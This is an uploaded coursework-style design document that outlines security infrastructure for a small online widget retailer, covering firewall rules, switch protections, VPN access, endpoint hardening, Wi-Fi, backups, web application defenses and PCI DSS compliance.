Uploaded by albertocozzarin

S i d doc

advertisement
Security infrastructure design document
This document describes an overview of the security standards and implementations
the company will adopt to reach the designated goals and legal requirements.
Premises:
- the company is a small but growing organization,employee base, with 50
employees in one small office;
- the company is an online retailer of the world’s finest artisanal, hand-crafted
widgets.
Requirements:
1) An external website permitting users to browse and purchase widgets
2) An internal intranet website for employees to use
3) Secure remote access for engineering employees
4) Reasonable, basic firewall rules
5) Wireless coverage in the office
6) Reasonably secure configurations for laptops
First, we will implement a firewall or we will check if the one the company has is a good
enterprise firewall and it is updated with the most recently patched and firmwares. Then
we will configure the basic firewall rules. But as we are beginning from scratch we apply
the concept of implicit deny and as we implement external websites, internal intranet
etc.. we will create rules that allow permission to those implementations. Implicit deny
means that the traffic not explicitly permitted is denied. We will implement, if the
company hasn’t already, enterprise switches which have a feature called Dhcp
snooping. This will help us monitor DHCP traffic, tracking IP assignments and map them
to hosts connected to switchboards. This will be used to protect against IP spoofing,
and ARP poisoning attacks. Ip spoofing means faking Ip address for deceptive
purposes, while ARP (address resolution protocol) poisoning means manipulating ARP
to redirect traffic maliciously. We will use DHCP snooping, IP source Guard, and DAI
(Dynamic ARP inspection) to prevent and detect these types of attack. Furthermore, we
will use IDS/IPS (intrusion detection system and intrusion prevention system) for
monitoring network traffic and analyzing it.
Second, we will set up the internal intranet website for employees and the network. We
will use VLAN (Virtual Local Area Network) to have more local area networks and
segregate traffic and enhance security and will separate the guest network and
separate it from the internal network to isolate potential threats. We will use windows
active directory for the internal network authentication process with Kerberos which will
create tickets to use with the allowed services and softwares. Internal machines and
internal machines will also need to use a Yubikey so that for access to the physical
machine the user will have to physically touch the key. This will create a secure multi
factor authentication environment. Thanks to windows directory we will be able to give
organizational units unique permission to needed folders and databases based on the
field of work of the users. This will also help monitor, protect and account for the privacy
of sensitive customers' data.Internal and external laptops will have the requirement to
have the TPM (Trusted Platform module) integrated, which will give more security to
those devices as they will have integrated cryptographics keys. Thus, the external
devices will have to use FDE (full disk encryption) to protect data in case they are stolen
or lost. We will give external users access to the internal website and storage through
VPN using the L2tp combined with IPSEC protocol, which is a very secure protocol.
Remote access will be given only to engineering employees Organizational Unit. Their
laptop will have special configuration and policies as all internal PCs will also have
them,such as:
-
Strong password and multi-factor implementation
FDE
Enforced regular software updates and security patches.
Anti-virus regularly updated.
Firewall (because it is recommended to have both host and network firewall.
Laptop will have VPN configuration configured and service allowed. Others pCs
no.
All unnecessary ports and services disabled.
Laptop and mobile devices if used to connect with the company will have remote
wipe enabled and tracking system.
Enforced regular data backups.
Mobile devices will have MDM (Mobile Device Management) and EMM (Enterprise
Mobile Management) configured to allow the company to remotely manage the devices.
Security and Privacy policy Recommendations courses and quizzes will be given to
employees once a year. Employees will be trained on the overall security and privacy
policies, as data classification, and incident response procedures. For example, they will
be trained to recognize phishing emails and other malware threats, to regular software
updates, and use strong passwords.
In the office there will be some AP (access point) to allow wi-fi connection. There won't
be a wps connection which will be deactivated. Ap will have a strong pre-shared key
using WPA2 with AES encryption. This will give a very secure wi-fi office access.
The company will have a NAS (Network Attached Storage) to regularly backup the
internal data-bases storage, internal website and external website, practically all data in
the servers. The server will control and force policies on applications. It will implement
Microsoft Defender 365 within the server and in the end points.
The internal website will implement RBAC to assign permission and limit access based
on job roles and responsibilities. It will have encryption enabled to protect
communication between employees browser and internal website utilizing HTTPS
protocol which encrypts data preventing unauthorized interception. Furthermore,
session management, logging and monitoring will be implemented.
The external website will have stronger implementation:
-
Access Control with Multi factor authentication
Secure coding practice
least privilege principle to prevent common attacks as SQL injection and XSS
(cross-site scripting)
Regular vulnerability scanning with special tools and softwares
A WAF (Web Application Firewall) will provide an additional layer of protection
and prevent DDos attacks, injection attempts and malicious file uploads.
SSL/TLS encryption must be used to encrypt communication between user and
the website. SSL/TLS certificate installed to enable HTTPS.
Content security policy
Regular Patch Management to update its components and plugins
Regular security audits and penetration tests. (those will have to be done also to
the entire internal network and to the endpoints devices)
As the company will handle customer credit cards payment, PCI DSS or Payment Card
Industry Data Security Standard must be followed as it is a legal requirement. Many of
these requirements are already covered by the implementation we described so far.
Other steps that can be taken are:
-
Assign a unique ID to each person
Restrict physical access to cardholder data
Do not use vendor-supplied default password or security parameter
etc..
This document is a summary of the implementation that will be done but it is not
exhaustive. Many other implementations will show up while proceeding to integrate the
suggested implementations and they will be also modified as new technologies will be
discovered and old ones implemented.
Download